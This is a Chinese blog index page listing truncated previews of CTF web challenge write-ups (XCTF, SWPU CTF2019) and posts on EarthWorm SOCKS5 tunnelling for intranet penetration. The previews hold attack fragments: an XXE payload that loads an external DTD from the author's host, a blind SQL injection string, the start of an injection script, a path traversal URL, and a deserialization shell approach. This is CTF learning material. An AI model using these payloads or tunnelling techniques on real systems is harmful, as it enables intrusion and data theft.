刘功瑞的博客

有一天你突然惊醒,发现这一切,都只不过是一场梦。

XCTF 攻防世界 web进阶 upload3 WriteUp(备份文件,代码审计,php反序列化)

这里首先想到的就是上传木马,但是经过尝试只能上传图片马,并且不能直接利用,经过抓包发现cookie是序列化内容,所以应该是通过cookie传递序列化内容,经过服务器的反序列化,然后对图片进行重命名操作,进而获得shell生成序列化cookie<?php class Profile {     public $checker = 0;     public&nb

SWPU CTF2019 Web5 WriteUp (xxe,java xxe,axis,excel)

根据题目提示是java xxe,先测试出xxe所在位置为xlsx的[Content_Types].xml文件先使用xxe读取目录payload放到excel里面<!DOCTYPE ANY[ <!ENTITY % send SYSTEM 'http://www.liugongrui.com/ctf/xxe/test.dtd'> %send; %test; %back; ]>test.dtd 放到自己

SWPU CTF2019 Web4 WriteUp (sql注入,代码审计,堆叠注入,PDO,文件包含)

注入脚本:# coding=utf-8 import re import requests import sys import binascii import json reload(sys) sys.setdefaultencoding("utf8") url = "http://182.92.220.157:11116/index.php?r=Login/Logi

SWPU CTF2019 Web3 WriteUp (SECRET_KEY 计算cookie,unzip 命令执行,软链接)

知识点:SECRET_KEY 计算cookie,unzip 命令执行,软链接解题思路SECRET_KEY:keyqqqwwweee!@#$%^&*用flask session cookie manager解密和重加密一下,修改id为1.eJyrVspMUbKqVlJIUrJS8g20tVWq1VHKLI7PyU_PzFOyKikqTdVRKkgsLi7PLwIqVEpMyQWK6yiVFqcW5SXmpsKFagFiyxgX.XekyGw.wYomzVd7LK9ea7WN-mZaQ0gl

SWPU CTF2019 Web2 WriteUp (Python反序列化,redis,session)

参考https://segmentfault.com/a/1190000013099825Python 反序列化安全问题(一)这一段时间使用flask做web开发,使用了redis存储session,阅读了flask_session源码,发现在存储session到redis过程中,利用了cPickle模块进行序列化以及反序列化;正好根据该样例学习一波Python反序列化相关的安全问题,不足之处请各位表哥指出。一、基础知识讲解1.1 cPickle模块Python中主要是用cPickle和pick

SWPU CTF2019 Web1 WriteUp (0'*'0注入)

知识点:sql注入注入点  0'/**/||/**/ascii(substr((select/**/pass/**/from/**/users/**/where/**/name='flag'),0,1))/**/>/**/ascii('53')/**/||/**/'0先注册个用户,然后发布广告广告的title可以注入注入脚本# coding=utf-8 import re import r

XCTF 攻防世界 web进阶 TimeKeeper writeup

知识点目录穿越,可任意文件读取flask模板注入,可获取SECRET_KEY,从而伪造session成为管理员上传tar文件自解压,可利用软连接读文件debug模式,生成pin码的关键信息都可获取到,计算pin码,执行命令目录穿越http://111.198.29.45:38930/asserts/..%2f..%2f..%2f..%2fflag   #读取假的flag   ciscn{this_is_a_sample_flag}格式化字符串+SESSIO

使用 EW 作 Socks5 代理进行内网渗透

基础知识内网穿透工具:EW(EarthWorm)下载地址: https://github.com/idlefire/ew本文介绍:如何使用EW做反向Socks5代理浏览器如何设置Socks5代理访问目标内网Web服务利用proxychains给终端设置Socks5代理(方便将本地命令行工具的流量代理进目标内网)基础环境Kali Linux(Attacker 内网 192.168.23.133)后面简称攻击机器Ubuntu 16.04.3(Attacker 公网 144.168

如何通过EW做Socks5代理进行内网渗透

0x00 前言最近搞站的时候有内网穿透的需求,大佬向我推荐了EW,本文模拟一个攻击场景对Earthworm的使用方法做一个简单的介绍。其实相应的内容EW的官网已经说得很详细了,我这里纯粹是作为个人笔记从如下几个方面做一个简单的记录:1、如何使用EW做反向Socks5代理2、浏览器如何设置Socks5代理访问目标内网Web服务3、利用proxychains给终端设置Socks5代理(方便将本地命令行工具的流量代理进目标内网)0x01 基础环境及网络拓扑Kali Linux(Attacker 内网

关于 EW 的介绍

下图是一张示意图:该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内,更多平台的支持还在维护中,敬请期待。使用方法:以下所有样例,如无特殊说明代理端口均为1080,服务均为SOCKSv5代理服务.该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_

Powered By Z-BlogPHP 1.5.2 Zero

Copyright www.liugongrui.com.All Rights Reserved.